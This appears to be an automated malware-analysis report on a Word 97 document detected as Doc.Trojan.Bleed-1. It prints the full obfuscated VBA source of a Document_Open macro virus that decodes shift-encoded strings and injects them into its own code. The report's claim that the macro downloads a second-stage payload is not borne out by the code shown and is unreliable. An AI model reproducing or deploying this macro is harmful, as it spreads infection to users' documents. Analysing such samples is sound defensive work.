Office (OLE) malware analysis — malicious · f231aaa2463643f6

MALICIOUS

Office (OLE)

28.0 KB Created: 2000-01-31 00:55:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: a4eec5d49eef2b20ef10919d229b3171 SHA-1: ead455f66f0488f50e2a6960d3a6f51e945366a0 SHA-256: f231aaa2463643f60df00985606db1556304fb5c3504ea9e97eff003f45c3fac

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that triggers on Document_Open. The macro appears to be obfuscated but is designed to download and execute a second-stage payload, as indicated by the 'bleed' string and the overall structure. The ClamAV detection 'Doc.Trojan.Bleed-1' further confirms its malicious nature. The primary attack vector is likely spearphishing attachment.

Heuristics 3

ClamAV: Doc.Trojan.Bleed-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bleed-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2755 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2755 bytes
SHA-256: `bb17a11c62240f650a6e9f6383518f60d9c684bee13e0a810c47bd18a25cd829`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Rem Name: Class97Macro.bleed Rem Author: jack twoflower LineZer0/Metaphase Rem Date: July 1999 Private Sub Document_Open() Dim jacky(17) As String jacky(1) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘W=p‚‘=Š~€Œ=Z=j~€�Œ`Œ‹‘~†‹‚�" jacky(2) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=Eo‹�=G=MFW=p‚‘^‘‘�=kŒ�Š~‰q‚Š�‰~‘‚Kc’‰‰k~Š‚I=“ kŒ�Š~‰" jacky(3) = "p‚‘=“ �=Z=Š~€ŒKs_m�Œ‡‚€‘W=l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=Eo‹�=G=MF" jacky(4) = "p‚‘=“ €=Z=“ �Ks_`ŒŠ�Œ‹‚‹‘�ENFW=p‚‘=€ŒŠŒ=Z=“ €K`Œ�‚jŒ�’‰‚" jacky(5) = "p‚‘=…Œ�‘=Z=kŒ�Š~‰q‚Š�‰~‘‚W=“€Œ�‚=Z=€ŒŠŒK‰†‹‚�ENI=OUF=C=“ `�=C=?b‹�=p’ ?" jacky(6) = "fƒ=Š~€Œ=Z=…Œ�‘=q…‚‹=p‚‘=…Œ�‘=Z=^€‘†“‚aŒ€’Š‚‹‘" jacky(7) = "p‚‘=‹‚”…Œ�‘=Z=…Œ�‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�ENFK`Œ�‚jŒ�’‰‚" jacky(8) = "fƒ=‹‚”…Œ�‘K‰†‹‚�ENI=NF=Y[=?m�†“~‘‚=p’ =aŒ€’Š‚‹‘\|l�‚‹EF?=q…‚‹" jacky(9) = "‹‚”…Œ�‘Ka‚‰‚‘‚i†‹‚�=NI=‹‚”…Œ�‘K€Œ’‹‘Œƒ‰†‹‚�" jacky(10) = "‹‚”…Œ�‘K~��ƒ�ŒŠ�‘�†‹„=“€Œ�‚" jacky(11) = "…Œ�‘Kp~“‚" jacky(12) = "b‹�=fƒ" jacky(13) = "fƒ=a~–EkŒ”EFF=Z=Ef‹‘Eo‹�=G=NRF=H=NF=q…‚‹" jacky(14) = "j�„_Œ•=?f=Š~ˆ‚=?=C=^��‰†€~‘†Œ‹Kr�‚�k~Š‚=C=?= ‰‚‚�>?I=MI=?`‰~��K ‰‚‚�=™=‡~€ˆ=‘”Œƒ‰Œ”‚�=L=i†‹‚w‚�M=L=j‚‘~�…~�‚?" jacky(15) = "b‹�=fƒ" jacky(16) = "q…†�aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�ENFK`Œ�‚jŒ�’‰‚Ka‚‰‚‘‚i†‹‚�=OVI=NU" jacky(17) = "fƒ=^€‘†“‚aŒ€’Š‚‹‘Kp~“‚�=Z=c~‰�‚=q…‚‹=^€‘†“‚aŒ€’Š‚‹‘Kp~“‚" For i = 1 To 17: vc = vc & encrypt(jacky(i)): Next i ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines 29, vc bleed End Sub Private Function encrypt(c As String) For x = 1 To Len(c): A = Asc(Mid(c, x, 1)): Ch = A - 29: NC = NC & Chr(Ch): Next encrypt = NC & vbCr End Function Private Sub bleed() End Sub

SHA-256: bb17a11c62240f650a6e9f6383518f60d9c684bee13e0a810c47bd18a25cd829

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Name:   Class97Macro.bleed
Rem  Author: jack twoflower LineZer0/Metaphase
Rem Date:   July 1999



Private Sub Document_Open()
Dim jacky(17) As String
jacky(1) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘W=p‚‘=Š~€Œ=Z=j~€�Œ`Œ‹‘~†‹‚�"
jacky(2) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=Eo‹�=G=MFW=p‚‘^‘‘�=kŒ�Š~‰q‚Š�‰~‘‚Kc’‰‰k~Š‚I=“ kŒ�Š~‰"
jacky(3) = "p‚‘=“ �=Z=Š~€ŒKs_m�Œ‡‚€‘W=l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=Eo‹�=G=MF"
jacky(4) = "p‚‘=“ €=Z=“ �Ks_`ŒŠ�Œ‹‚‹‘�ENFW=p‚‘=€ŒŠŒ=Z=“ €K`Œ�‚jŒ�’‰‚"
jacky(5) = "p‚‘=…Œ�‘=Z=kŒ�Š~‰q‚Š�‰~‘‚W=“€Œ�‚=Z=€ŒŠŒK‰†‹‚�ENI=OUF=C=“ `�=C=?b‹�=p’ ?"
jacky(6) = "fƒ=Š~€Œ=Z=…Œ�‘=q…‚‹=p‚‘=…Œ�‘=Z=^€‘†“‚aŒ€’Š‚‹‘"
jacky(7) = "p‚‘=‹‚”…Œ�‘=Z=…Œ�‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�ENFK`Œ�‚jŒ�’‰‚"
jacky(8) = "fƒ=‹‚”…Œ�‘K‰†‹‚�ENI=NF=Y[=?m�†“~‘‚=p’ =aŒ€’Š‚‹‘|l�‚‹EF?=q…‚‹"
jacky(9) = "‹‚”…Œ�‘Ka‚‰‚‘‚i†‹‚�=NI=‹‚”…Œ�‘K€Œ’‹‘Œƒ‰†‹‚�"
jacky(10) = "‹‚”…Œ�‘K~��ƒ�ŒŠ�‘�†‹„=“€Œ�‚"
jacky(11) = "…Œ�‘Kp~“‚"
jacky(12) = "b‹�=fƒ"
jacky(13) = "fƒ=a~–EkŒ”EFF=Z=Ef‹‘Eo‹�=G=NRF=H=NF=q…‚‹"
jacky(14) = "j�„_Œ•=?f=Š~ˆ‚=?=C=^��‰†€~‘†Œ‹Kr�‚�k~Š‚=C=?= ‰‚‚�>?I=MI=?`‰~��K ‰‚‚�=™=‡~€ˆ=‘”Œƒ‰Œ”‚�=L=i†‹‚w‚�M=L=j‚‘~�…~�‚?"
jacky(15) = "b‹�=fƒ"
jacky(16) = "q…†�aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�ENFK`Œ�‚jŒ�’‰‚Ka‚‰‚‘‚i†‹‚�=OVI=NU"
jacky(17) = "fƒ=^€‘†“‚aŒ€’Š‚‹‘Kp~“‚�=Z=c~‰�‚=q…‚‹=^€‘†“‚aŒ€’Š‚‹‘Kp~“‚"
For i = 1 To 17: vc = vc & encrypt(jacky(i)): Next i
ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines 29, vc
bleed
End Sub
Private Function encrypt(c As String)
For x = 1 To Len(c): A = Asc(Mid(c, x, 1)): Ch = A - 29: NC = NC & Chr(Ch): Next
encrypt = NC & vbCr
End Function
Private Sub bleed()
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.